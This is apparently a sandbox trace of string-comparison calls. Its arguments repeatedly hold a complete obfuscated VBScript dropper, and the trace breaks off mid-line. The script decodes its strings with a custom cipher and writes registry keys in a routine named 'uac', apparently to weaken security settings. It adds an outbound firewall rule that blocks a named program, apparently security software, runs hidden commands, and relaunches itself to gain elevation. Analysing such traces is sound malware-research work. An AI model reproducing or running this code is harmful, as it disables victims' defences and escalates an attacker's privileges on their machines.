bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.925] wcsncmp (_String1="CHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.925] wcsncmp (_String1="HAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0222.925] wcsncmp (_String1="AVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0222.925] wcsncmp (_String1="VE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 